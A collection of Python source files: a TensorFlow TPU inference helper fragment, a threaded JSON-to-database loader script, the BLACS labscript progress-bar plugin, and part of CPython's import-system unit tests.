device_assignment = ctx.device_assignment
else:
device_assignment = None
if experimental_export_device_assignment:
tensors_on_cpu = tpu.rewrite_for_inference(
tpu_computation, device_assignment=device_assignment)
else:
tensors_on_cpu = tpu.rewrite(
tpu_computation, device_assignment=device_assignment)
tpu.prune_unconnected_ops_from_xla(ops.get_default_graph())
(estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict) = (
tpu_capture.get())
predictions_list = tensors_on_cpu[:len(predictions_dict)]
export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
# Reconstruct tensors used in export_outputs, with TPU tensors replaced
# with their CPU counterpart returned from `rewrite_for_inference()`.
# `function.Defun()` does not like `None`s in return values, so we leave
# `None`s out but record their positions for later reconstruction.
export_outputs_list_without_none = []
none_indices = []
for i, t in enumerate(export_outputs_list):
if t is None:
none_indices.append(i)
else:
export_outputs_list_without_none.append(
export_outputs_tpu_on_cpu_list.pop(0))
capture.capture(
(estimator_spec, export_outputs_dict, predictions_dict, none_indices))
return predictions_list + export_outputs_list_without_none
return computation, capture
def _build_tpu_computation_for_inference(model_fn, features, labels, config,
params):
"""Builds the TPU computation for inference on TPU."""
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
model_fn_args = function_utils.fn_args(model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
if 'labels' in model_fn_args:
kwargs['labels'] = labels
if 'mode' in model_fn_args:
kwargs['mode'] = model_fn_lib.ModeKeys.PREDICT
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
estimator_spec = model_fn(features, **kwargs)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
export_outputs_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
export_outputs_list = nest.flatten(export_outputs_dict)
export_outputs_tpu_list = [t for t in export_outputs_list if t is not None]
if isinstance(estimator_spec.predictions, dict):
predictions_dict = collections.OrderedDict(
(k, v) for k, v in six.iteritems(estimator_spec.predictions))
else:
predictions_dict = {
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
}
predictions_list = nest.flatten(predictions_dict)
# We cannot return everything we want through the return values, so
# capture the rest here for later use.
capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict))
return predictions_list + export_outputs_tpu_list
return computation, capture
def inference_on_tpu(computation,
inputs_to_tpu,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes=None,
max_enqueued_batches=10):
"""Convenient wrapper for export_saved_model API v2 to wrap TPU computation.
It puts computation on TPU, add batching around it and round robin computation
between TPU cores.
See tpu_estimator_test.py for an example.
Args:
computation: computation to be put on TPU, which takes inputs_to_tpu as
arguments.
inputs_to_tpu: a list of tensors as input to computation.
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op to
pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to 10.
Returns:
The unbatched computation output Tensors.
"""
@batch_ops.batch_function(num_batch_threads, max_batch_size,
batch_timeout_micros, allowed_batch_sizes,
max_enqueued_batches)
def batched_tpu_computation(*args):
@function.Defun(capture_resource_var_by_value=False)
def tpu_computation():
return tpu.rewrite(computation, args)
return tpu_functional.TPUPartitionedCall(
args=tpu_computation.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_computation.definition.signature.output_arg],
f=tpu_computation)
return batched_tpu_computation(*inputs_to_tpu)
|
load_addresses.py
|
import json
import sys
sys.path.append('/Users/xxx0624/SWArch/5200_flask_app/app')
from db_functions import *
import threading
import logging
logger = logging.getLogger('5200_flask_app')
hdlr = logging.FileHandler('/var/tmp/5200_flask_app.log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.WARNING)
def process(items, start, end):
for index in range(start, end, 1):
print (index)
item = items[index]
try:
create(item)
except Exception:
print ('error with item: ', index)
logger.error(index + item)
if __name__ == '__main__':
file_path = sys.argv[1]
all_data = None
with open(file_path) as f:
all_data = json.load(f)
threads = []
threads_num = 50
per_share_size = len(all_data) / threads_num
start_index = 0
while start_index < len(all_data):
end_index = start_index + per_share_size
threads.append(threading.Thread(
target=process, args=(all_data, int(start_index), int(end_index))))
threads[-1].start() # start the thread we just created
start_index = end_index
# wait for all threads to finish
for t in threads:
t.join()
print ('done')
|
__init__.py
|
#####################################################################
# #
# /plugins/progress_bar/__init__.py #
# #
# Copyright 2018, Christopher Billington #
# #
# This file is part of the program BLACS, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
from labscript_utils import PY2
if PY2:
from Queue import Queue, Empty
else:
from queue import Queue, Empty
import logging
import os
import subprocess
import threading
import sys
import time
import numpy as np
from qtutils import UiLoader, inmain, inmain_decorator
from qtutils.qt import QtGui, QtWidgets, QtCore
import labscript_utils.h5_lock
import h5py
import labscript_utils.properties as properties
from labscript_utils.connections import ConnectionTable
from zprocess import Event, TimeoutError
from blacs.plugins import PLUGINS_DIR, callback
name = "Progress Bar"
module = "progress_bar" # should be folder name
logger = logging.getLogger('BLACS.plugin.%s'%module)
# The progress bar will update every UPDATE_INTERVAL seconds, or at the marker
# times, whichever is soonest after the last update:
UPDATE_INTERVAL = 0.02
BAR_MAX = 1000
def _ensure_str(s):
"""convert bytestrings and numpy strings to python strings"""
return s.decode() if isinstance(s, bytes) else str(s)
def black_has_good_contrast(r, g, b):
"""Return whether black text or white text would have better contrast on a
background of the given colour, according to W3C recommendations (see
https://www.w3.org/TR/WCAG20/). Return True for black or False for
white"""
cs = []
for c in r, g, b:
c = c / 255.0
if c <= 0.03928:
c = c/12.92
else:
c = ((c+0.055)/1.055) ** 2.4
cs.append(c)
r, g, b = cs
L = 0.2126 * r + 0.7152 * g + 0.0722 * b
return L > np.sqrt(1.05 * 0.05) - 0.05
class Plugin(object):
def __init__(self, initial_settings):
self.menu = None
self.notifications = {}
self.initial_settings = initial_settings
self.BLACS = None
self.command_queue = Queue()
self.master_pseudoclock = None
self.shot_start_time = None
self.stop_time = None
self.markers = None
self.waits = None
self.time_spent_waiting = None
self.next_wait_index = None
self.next_marker_index = None
self.bar_text_prefix = None
self.h5_filepath = None
self.wait_completed_events_supported = False
self.wait_completed = Event('wait_completed', type='wait')
self.mainloop_thread = threading.Thread(target=self.mainloop)
self.mainloop_thread.daemon = True
self.mainloop_thread.start()
def plugin_setup_complete(self, BLACS):
self.BLACS = BLACS
self.ui = UiLoader().load(os.path.join(PLUGINS_DIR, module, 'controls.ui'))
self.bar = self.ui.bar
self.style = QtWidgets.QStyleFactory.create('Fusion')
if self.style is None:
# If we're on Qt4, fall back to Plastique style:
self.style = QtWidgets.QStyleFactory.create('Plastique')
if self.style is None:
# Not sure what's up, but fall back to app's default style:
self.style = QtWidgets.QApplication.style()
self.bar.setStyle(self.style)
self.bar.setMaximum(BAR_MAX)
self.bar.setAlignment(QtCore.Qt.AlignCenter)
# Add our controls to the BLACS gui:
BLACS['ui'].queue_status_verticalLayout.insertWidget(0, self.ui)
# We need to know the name of the master pseudoclock so we can look up
# the duration of each shot:
self.master_pseudoclock = self.BLACS['experiment_queue'].master_pseudoclock
# Check if the wait monitor device, if any, supports wait completed events:
with h5py.File(self.BLACS['connection_table_h5file'], 'r') as f:
if 'waits' in f:
acq_device = f['waits'].attrs['wait_monitor_acquisition_device']
acq_device = _ensure_str(acq_device)
if acq_device:
props = properties.get(f, acq_device, 'connection_table_properties')
if props.get('wait_monitor_supports_wait_completed_events', False):
self.wait_completed_events_supported = True
self.ui.wait_warning.hide()
def get_save_data(self):
return {}
def get_callbacks(self):
return {'science_over': self.on_science_over,
'science_starting': self.on_science_starting}
@callback(priority=100)
def on_science_starting(self, h5_filepath):
# Tell the mainloop that we're starting a shot:
self.command_queue.put(('start', h5_filepath))
@callback(priority=5)
def on_science_over(self, h5_filepath):
# Tell the mainloop we're done with this shot:
self.command_queue.put(('stop', None))
@inmain_decorator(True)
def clear_bar(self):
self.bar.setEnabled(False)
self.bar.setFormat('No shot running')
self.bar.setValue(0)
self.bar.setPalette(self.style.standardPalette())
self.ui.wait_warning.hide()
def get_next_thing(self):
"""Figure out what's going to happen next: a wait, a time marker, or a
regular update. Return a string saying which, and a float saying how
long from now it will occur. If the thing has already happened but not
been taken into account by our processing yet, then return zero for
the time."""
if self.waits is not None and self.next_wait_index < len(self.waits):
next_wait_time = self.waits['time'][self.next_wait_index]
else:
next_wait_time = np.inf
if self.markers is not None and self.next_marker_index < len(self.markers):
next_marker_time = self.markers['time'][self.next_marker_index]
else:
next_marker_time = np.inf
assert self.shot_start_time is not None
assert self.time_spent_waiting is not None
labscript_time = time.time() - self.shot_start_time - self.time_spent_waiting
next_update_time = labscript_time + UPDATE_INTERVAL
if next_update_time < next_wait_time and next_update_time < next_marker_time:
return 'update', UPDATE_INTERVAL
elif next_wait_time < next_marker_time:
return 'wait', max(0, next_wait_time - labscript_time)
else:
return 'marker', max(0, next_marker_time - labscript_time)
@inmain_decorator(True)
def update_bar_style(self, marker=False, wait=False, previous=False):
"""Update the bar's style to reflect the next marker or wait,
according to self.next_marker_index or self.next_wait_index. If
previous=True, instead update to reflect the current marker or
wait."""
assert not (marker and wait)
# Ignore requests to reflect markers or waits if there are no markers
# or waits in this shot:
marker = marker and self.markers is not None and len(self.markers) > 0
wait = wait and self.waits is not None and len(self.waits) > 0
if marker:
marker_index = self.next_marker_index
if previous:
marker_index -= 1
assert marker_index >= 0
label, _, color = self.markers[marker_index]
self.bar_text_prefix = '[%s] ' % _ensure_str(label)
r, g, b = color[0]
# Black is the default colour in labscript.add_time_marker.
# Don't change the bar colour if the marker colour is black.
if (r, g, b) != (0,0,0):
bar_color = QtGui.QColor(r, g, b)
if black_has_good_contrast(r, g, b):
highlight_text_color = QtCore.Qt.black
else:
highlight_text_color = QtCore.Qt.white
else:
bar_color = None
highlight_text_color = None
regular_text_color = None # use default
elif wait:
wait_index = self.next_wait_index
if previous:
wait_index -= 1
assert wait_index >= 0
label = self.waits[wait_index]['label']
self.bar_text_prefix = '-%s- ' % _ensure_str(label)
highlight_text_color = regular_text_color = QtGui.QColor(192, 0, 0)
bar_color = QtCore.Qt.gray
if marker or wait:
palette = QtGui.QPalette()
if bar_color is not None:
palette.setColor(QtGui.QPalette.Highlight, bar_color)
# Ensure the colour of the text on the filled in bit of the progress
# bar has good contrast:
if highlight_text_color is not None:
palette.setColor(QtGui.QPalette.HighlightedText, highlight_text_color)
if regular_text_color is not None:
palette.setColor(QtGui.QPalette.Text, regular_text_color)
self.bar.setPalette(palette)
else:
self.bar_text_prefix = None
# Default palette:
self.bar.setPalette(self.style.standardPalette())
@inmain_decorator(True)
def update_bar_value(self, marker=False, wait=False):
"""Update the progress bar with the current time elapsed. If marker or wait is
true, then use the exact time at which the next marker or wait is defined,
rather than the current time as returned by time.time()"""
thinspace = u'\u2009'
self.bar.setEnabled(True)
assert not (marker and wait)
if marker:
labscript_time = self.markers['time'][self.next_marker_index]
elif wait:
labscript_time = self.waits['time'][self.next_wait_index]
else:
labscript_time = time.time() - self.shot_start_time - self.time_spent_waiting
value = int(round(labscript_time / self.stop_time * BAR_MAX))
self.bar.setValue(value)
text = u'%.2f%ss / %.2f%ss (%%p%s%%)'
text = text % (labscript_time, thinspace, self.stop_time, thinspace, thinspace)
if self.bar_text_prefix is not None:
text = self.bar_text_prefix + text
self.bar.setFormat(text)
def _start(self, h5_filepath):
"""Called from the mainloop when starting a shot"""
self.h5_filepath = h5_filepath
# Get the stop time, any waits and any markers from the shot:
with h5py.File(h5_filepath, 'r') as f:
props = properties.get(f, self.master_pseudoclock, 'device_properties')
self.stop_time = props['stop_time']
try:
self.markers = f['time_markers'][:]
self.markers.sort(order=(bytes if PY2 else str)('time'))
except KeyError:
self.markers = None
try:
self.waits = f['waits'][:]
self.waits.sort(order=(bytes if PY2 else str)('time'))
except KeyError:
self.waits = None
self.shot_start_time = time.time()
self.time_spent_waiting = 0
self.next_marker_index = 0
self.next_wait_index = 0
def _stop(self):
"""Called from the mainloop when ending a shot"""
self.h5_filepath = None
self.shot_start_time = None
self.stop_time = None
self.markers = None
self.waits = None
self.time_spent_waiting = None
self.next_wait_index = None
self.next_marker_index = None
self.bar_text_prefix = None
def mainloop(self):
running = False
self.clear_bar()
while True:
try:
if running:
# How long until the next thing of interest occurs, and
# what is it? It can be either a wait, a marker, or a
# regular update.
next_thing, timeout = self.get_next_thing()
try:
command, _ = self.command_queue.get(timeout=timeout)
except Empty:
if next_thing == 'update':
self.update_bar_value()
if next_thing == 'marker':
self.update_bar_style(marker=True)
self.update_bar_value(marker=True)
self.next_marker_index += 1
elif next_thing == 'wait':
wait_start_time = time.time()
self.update_bar_style(wait=True)
self.update_bar_value(wait=True)
self.next_wait_index += 1
# wait for the wait to complete, but abandon
# processing if the command queue is non-empty,
# i.e. if a stop command is sent.
while self.command_queue.empty():
try:
# Wait for only 0.1 sec at a time, so that
# we can check if the queue is empty in between:
self.wait_completed.wait(self.h5_filepath, timeout=0.1)
except TimeoutError:
# Only wait for wait completed events if the wait
# monitor device supports them. Otherwise, skip
# after this first timeout, and it will just look
# like the wait had 0.1 sec duration.
if self.wait_completed_events_supported:
# The wait is still in progress:
continue
# The wait completed (or completion events are not
# supported):
self.time_spent_waiting += time.time() - wait_start_time
# Set the bar style back to whatever the
# previous marker was, if any:
self.update_bar_style(marker=True, previous=True)
self.update_bar_value()
break
continue
else:
command, h5_filepath = self.command_queue.get()
if command == 'close':
break
elif command == 'start':
assert not running
running = True
self._start(h5_filepath)
self.update_bar_value()
if (
self.waits is not None
and len(self.waits) > 0
and not self.wait_completed_events_supported
):
inmain(self.ui.wait_warning.show)
elif command == 'stop':
assert running
self.clear_bar()
running = False
self._stop()
else:
raise ValueError(command)
except Exception:
logger.exception("Exception in mainloop, ignoring.")
# Stop processing of the current shot, if any.
self.clear_bar()
inmain(self.bar.setFormat, "Error in progress bar plugin")
running = False
self._stop()
def close(self):
self.command_queue.put(('close', None))
self.mainloop_thread.join()
# The rest of these are boilerplate:
def get_menu_class(self):
return None
def get_notification_classes(self):
return []
def get_setting_classes(self):
return []
def set_menu_instance(self, menu):
self.menu = menu
def set_notification_instances(self, notifications):
self.notifications = notifications
|
__init__.py
|
# We import importlib *ASAP* in order to test #15386
import importlib
import importlib.util
from importlib._bootstrap_external import _get_sourcefile
import builtins
import marshal
import os
import platform
import py_compile
import random
import stat
import sys
import threading
import time
import unittest
import unittest.mock as mock
import textwrap
import errno
import contextlib
import test.support
from test.support import (
EnvironmentVarGuard, TESTFN, check_warnings, forget, JYTHON,
make_legacy_pyc, rmtree, run_unittest, swap_attr, swap_item, temp_umask,
unlink, unload, create_empty_file, cpython_only, TESTFN_UNENCODABLE,
temp_dir, DirsOnSysPath)
from test.support import script_helper
from test.test_importlib.util import uncache
skip_if_dont_write_bytecode = unittest.skipIf(
sys.dont_write_bytecode,
"test meaningful only when writing bytecode")
def remove_files(name):
for f in (name + ".py",
name + ".pyc",
name + ".pyw",
name + "$py.class"):
unlink(f)
rmtree('__pycache__')
@contextlib.contextmanager
def _ready_to_import(name=None, source=""):
# sets up a temporary directory and removes it
# creates the module file
# temporarily clears the module from sys.modules (if any)
# reverts or removes the module when cleaning up
name = name or "spam"
with temp_dir() as tempdir:
path = script_helper.make_script(tempdir, name, source)
old_module = sys.modules.pop(name, None)
try:
sys.path.insert(0, tempdir)
yield name, path
sys.path.remove(tempdir)
finally:
if old_module is not None:
sys.modules[name] = old_module
elif name in sys.modules:
del sys.modules[name]
class ImportTests(unittest.TestCase):
def setUp(self):
remove_files(TESTFN)
importlib.invalidate_caches()
def tearDown(self):
unload(TESTFN)
def test_import_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
import something_that_should_not_exist_anywhere
def test_from_import_missing_module_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
from something_that_should_not_exist_anywhere import blah
def test_from_import_missing_attr_raises_ImportError(self):
with self.assertRaises(ImportError):
from importlib import something_that_should_not_exist_anywhere
def test_from_import_missing_attr_has_name_and_path(self):
with self.assertRaises(ImportError) as cm:
from os import i_dont_exist
self.assertEqual(cm.exception.name, 'os')
self.assertEqual(cm.exception.path, os.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from 'os' \(.*os.py\)")
@cpython_only
def test_from_import_missing_attr_has_name_and_so_path(self):
import _testcapi
with self.assertRaises(ImportError) as cm:
from _testcapi import i_dont_exist
self.assertEqual(cm.exception.name, '_testcapi')
self.assertEqual(cm.exception.path, _testcapi.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from '_testcapi' \(.*\.(so|pyd)\)")
def test_from_import_missing_attr_has_name(self):
with self.assertRaises(ImportError) as cm:
# _warning has no path as it's a built-in module.
from _warning import i_dont_exist
self.assertEqual(cm.exception.name, '_warning')
self.assertIsNone(cm.exception.path)
def test_from_import_missing_attr_path_is_canonical(self):
with self.assertRaises(ImportError) as cm:
from os.path import i_dont_exist
self.assertIn(cm.exception.name, {'posixpath', 'ntpath'})
self.assertIsNotNone(cm.exception)
def test_from_import_star_invalid_type(self):
import re
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("__all__ = [b'invalid_type']")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__all__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("globals()[b'invalid_type'] = object()")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__dict__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
def test_case_sensitivity(self):
# Brief digression to test that import is case-sensitive: if we got
# this far, we know for sure that "random" exists.
with self.assertRaises(ImportError):
import RAnDoM
def test_double_const(self):
# Another brief digression to test the accuracy of manifest float
# constants.
from test import double_const # don't blink -- that *was* the test
def test_import(self):
def test_with_extension(ext):
# The extension is normally ".py", perhaps ".pyw".
source = TESTFN + ext
if JYTHON:
pyc = TESTFN + "$py.class"
else:
pyc = TESTFN + ".pyc"
with open(source, "w") as f:
print("# This tests Python's ability to import a",
ext, "file.", file=f)
a = random.randrange(1000)
b = random.randrange(1000)
print("a =", a, file=f)
print("b =", b, file=f)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
importlib.invalidate_caches()
try:
try:
mod = __import__(TESTFN)
except ImportError as err:
self.fail("import from %s failed: %s" % (ext, err))
self.assertEqual(mod.a, a,
"module loaded (%s) but contents invalid" % mod)
self.assertEqual(mod.b, b,
"module loaded (%s) but contents invalid" % mod)
finally:
forget(TESTFN)
unlink(source)
unlink(pyc)
sys.path.insert(0, os.curdir)
try:
test_with_extension(".py")
if sys.platform.startswith("win"):
for ext in [".PY", ".Py", ".pY", ".pyw", ".PYW", ".pYw"]:
test_with_extension(ext)
finally:
del sys.path[0]
def test_module_with_large_stack(self, module='longlist'):
# Regression test for http://bugs.python.org/issue561858.
filename = module + '.py'
# Create a file with a list of 65000 elements.
with open(filename, 'w') as f:
f.write('d = [\n')
for i in range(65000):
f.write('"",\n')
f.write(']')
try:
# Compile & remove .py file; we only need .pyc.
# Bytecode must be relocated from the PEP 3147 bytecode-only location.
py_compile.compile(filename)
finally:
unlink(filename)
# Need to be able to load from current dir.
sys.path.append('')
importlib.invalidate_caches()
namespace = {}
try:
make_legacy_pyc(filename)
# This used to crash.
exec('import ' + module, None, namespace)
finally:
# Cleanup.
del sys.path[-1]
unlink(filename + 'c')
unlink(filename + 'o')
# Remove references to the module (unload the module)
namespace.clear()
try:
del sys.modules[module]
except KeyError:
pass
def test_failing_import_sticks(self):
source = TESTFN + ".py"
with open(source, "w") as f:
print("a = 1/0", file=f)
# New in 2.4, we shouldn't be able to import that no matter how often
# we try.
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
if TESTFN in sys.modules:
del sys.modules[TESTFN]
try:
for i in [1, 2, 3]:
self.assertRaises(ZeroDivisionError, __import__, TESTFN)
self.assertNotIn(TESTFN, sys.modules,
"damaged module in sys.modules on %i try" % i)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_import_name_binding(self):
# import x.y.z binds x in the current namespace
import test as x
import test.support
self.assertIs(x, test, x.__name__)
self.assertTrue(hasattr(test.support, "__file__"))
# import x.y.z as w binds z as w
import test.support as y
self.assertIs(y, test.support, y.__name__)
def test_issue31286(self):
# import in a 'finally' block resulted in SystemError
try:
x = ...
finally:
import test.support.script_helper as x
# import in a 'while' loop resulted in stack overflow
i = 0
while i < 10:
import test.support.script_helper as x
i += 1
# import in a 'for' loop resulted in segmentation fault
for i in range(2):
import test.support.script_helper as x
def test_failing_reload(self):
# A failing reload should leave the module object in sys.modules.
source = TESTFN + os.extsep + "py"
with open(source, "w") as f:
f.write("a = 1\nb=2\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertIn(TESTFN, sys.modules)
self.assertEqual(mod.a, 1, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
# On WinXP, just replacing the .py file wasn't enough to
# convince reload() to reparse it. Maybe the timestamp didn't
# move enough. We force it to get reparsed by removing the
# compiled file too.
remove_files(TESTFN)
# Now damage the module.
with open(source, "w") as f:
f.write("a = 10\nb=20//0\n")
self.assertRaises(ZeroDivisionError, importlib.reload, mod)
# But we still expect the module to be in sys.modules.
mod = sys.modules.get(TESTFN)
self.assertIsNotNone(mod, "expected module to be in sys.modules")
# We should have replaced a w/ 10, but the old b value should
# stick.
self.assertEqual(mod.a, 10, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
finally:
del sys.path[0]
remove_files(TESTFN)
unload(TESTFN)
@skip_if_dont_write_bytecode
def test_file_to_source(self):
# check if __file__ points to the source file where available
source = TESTFN + ".py"
with open(source, "w") as f:
f.write("test = None\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertTrue(mod.__file__.endswith('.py'))
os.remove(source)
del sys.modules[TESTFN]
make_legacy_pyc(source)
importlib.invalidate_caches()
mod = __import__(TESTFN)
base, ext = os.path.splitext(mod.__file__)
self.assertEqual(ext, '.pyc')
finally:
del sys.path[0]
remove_files(TESTFN)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
def test_import_by_filename(self):
path = os.path.abspath(TESTFN)
encoding = sys.getfilesystemencoding()
try:
path.encode(encoding)
except UnicodeEncodeError:
self.skipTest('path is not encodable to {}'.format(encoding))
with self.assertRaises(ImportError) as c:
__import__(path)
def test_import_in_del_does_not_crash(self):
# Issue 4236
testfn = script_helper.make_script('', TESTFN, textwrap.dedent("""\
import sys
class C:
def __del__(self):
import importlib
sys.argv.insert(0, C())
"""))
script_helper.assert_python_ok(testfn)
@skip_if_dont_write_bytecode
def test_timestamp_overflow(self):
# A modification timestamp larger than 2**32 should not be a problem
# when importing a module (issue #11235).
sys.path.insert(0, os.curdir)
try:
source = TESTFN + ".py"
compiled = importlib.util.cache_from_source(source)
with open(source, 'w') as f:
pass
try:
os.utime(source, (2 ** 33 - 5, 2 ** 33 - 5))
except OverflowError:
self.skipTest("cannot set modification time to large integer")
except OSError as e:
if e.errno not in (getattr(errno, 'EOVERFLOW', None),
getattr(errno, 'EINVAL', None)):
raise
self.skipTest("cannot set modification time to large integer ({})".format(e))
__import__(TESTFN)
# The pyc file was created.
os.stat(compiled)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_bogus_fromlist(self):
try:
__import__('http', fromlist=['blah'])
except ImportError:
self.fail("fromlist must allow bogus names")
@cpython_only
def test_delete_builtins_import(self):
args = ["-c", "del __builtins__.__import__; import os"]
popen = script_helper.spawn_python(*args)
stdout, stderr = popen.communicate()
self.assertIn(b"ImportError", stdout)
def test_from_import_message_for_nonexistent_module(self):
with self.assertRaisesRegex(ImportError, "^No module named 'bogus'"):
from bogus import foo
def test_from_import_message_for_existing_module(self):
with self.assertRaisesRegex(ImportError, "^cannot import name 'bogus'"):
from re import bogus
def test_from_import_AttributeError(self):
# Issue #24492: trying to import an attribute that raises an
# AttributeError should lead to an ImportError.
class AlwaysAttributeError:
def __getattr__(self, _):
raise AttributeError
module_name = 'test_from_import_AttributeError'
self.addCleanup(unload, module_name)
sys.modules[module_name] = AlwaysAttributeError()
with self.assertRaises(ImportError) as cm:
from test_from_import_AttributeError import does_not_exist
self.assertEqual(str(cm.exception),
"cannot import name 'does_not_exist' from '<unknown module name>' (unknown location)")
@cpython_only
def test_issue31492(self):
# There shouldn't be an assertion failure in case of failing to import
# from a module with a bad __name__ attribute, or in case of failing
# to access an attribute of such a module.
with swap_attr(os, '__name__', None):
with self.assertRaises(ImportError):
from os import does_not_exist
with self.assertRaises(AttributeError):
os.does_not_exist
def test_concurrency(self):
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'data'))
try:
exc = None
def run():
event.wait()
try:
import package
except BaseException as e:
nonlocal exc
exc = e
for i in range(10):
event = threading.Event()
threads = [threading.Thread(target=run) for x in range(2)]
try:
with test.support.start_threads(threads, event.set):
time.sleep(0)
finally:
sys.modules.pop('package', None)
sys.modules.pop('package.submodule', None)
if exc is not None:
raise exc
finally:
del sys.path[0]
@skip_if_dont_write_bytecode
class FilePermissionTests(unittest.TestCase):
# tests for file mode on cached .pyc files
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_creation_mode(self):
mask = 0o022
with temp_umask(mask), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
module = __import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
# Check that the umask is respected, and the executable bits
# aren't set.
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)),
oct(0o666 & ~mask))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_mode_issue_2051(self):
# permissions of .pyc should match those of .py, regardless of mask
mode = 0o600
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(mode))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_readonly(self):
mode = 0o400
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
expected = mode | 0o200 # Account for fix for issue #6074
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(expected))
def test_pyc_always_writable(self):
# Initially read-only .pyc files on Windows used to cause problems
# with later updates, see issue #6074 for details
with _ready_to_import() as (name, path):
# Write a Python file, make it read-only and import it
with open(path, 'w') as f:
f.write("x = 'original'\n")
# Tweak the mtime of the source to ensure pyc gets updated later
s = os.stat(path)
os.utime(path, (s.st_atime, s.st_mtime-100000000))
os.chmod(path, 0o400)
m = __import__(name)
self.assertEqual(m.x, 'original')
# Change the file and then reimport it
os.chmod(path, 0o600)
with open(path, 'w') as f:
f.write("x = 'rewritten'\n")
unload(name)
importlib.invalidate_caches()
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
# Now delete the source file and check the pyc was rewritten
unlink(path)
unload(name)
importlib.invalidate_caches()
bytecode_only = path + "c"
os.rename(importlib.util.cache_from_source(path), bytecode_only)
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
class PycRewritingTests(unittest.TestCase):
# Test that the `co_filename` attribute on code objects always points
# to the right file, even when various things happen (e.g. both the .py
# and the .pyc file are renamed).
module_name = "unlikely_module_name"
module_source = """
import sys
code_filename = sys._getframe().f_code.co_filename
module_filename = __file__
constant = 1
def func():
pass
func_filename = func.__code__.co_filename
"""
dir_name = os.path.abspath(TESTFN)
file_name = os.path.join(dir_name, module_name) + os.extsep + "py"
compiled_name = importlib.util.cache_from_source(file_name)
def setUp(self):
self.sys_path = sys.path[:]
self.orig_module = sys.modules.pop(self.module_name, None)
os.mkdir(self.dir_name)
with open(self.file_name, "w") as f:
f.write(self.module_source)
sys.path.insert(0, self.dir_name)
importlib.invalidate_caches()
def tearDown(self):
sys.path[:] = self.sys_path
if self.orig_module is not None:
sys.modules[self.module_name] = self.orig_module
else:
unload(self.module_name)
unlink(self.file_name)
unlink(self.compiled_name)
rmtree(self.dir_name)
def import_module(self):
ns = globals()
__import__(self.module_name, ns, ns)
return sys.modules[self.module_name]
def test_basics(self):
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
